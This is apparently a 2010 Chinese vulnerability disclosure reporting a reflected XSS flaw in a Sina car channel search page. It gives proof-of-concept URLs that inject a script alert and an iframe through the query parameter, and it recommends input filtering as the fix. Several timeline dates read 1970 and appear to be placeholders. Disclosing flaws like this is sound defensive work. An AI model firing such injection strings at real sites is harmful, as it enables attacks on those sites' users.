漏洞详情
披露状态:
2010-07-28: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-27: 细节向公众公开
简要描述:
新浪某频道XSS漏洞
详细说明:
对搜索的字符未进行有效的处理过滤 造成XSS漏洞
漏洞证明:
http://che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query="><script>alert()</script>&service=cars
http://che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query="><iframe src=http://www.baidu.com></iframe>&service=cars
可直接进行弹窗iframe等常见跨站攻击方式。
修复方案:
对搜索的字符进行过滤处理即可。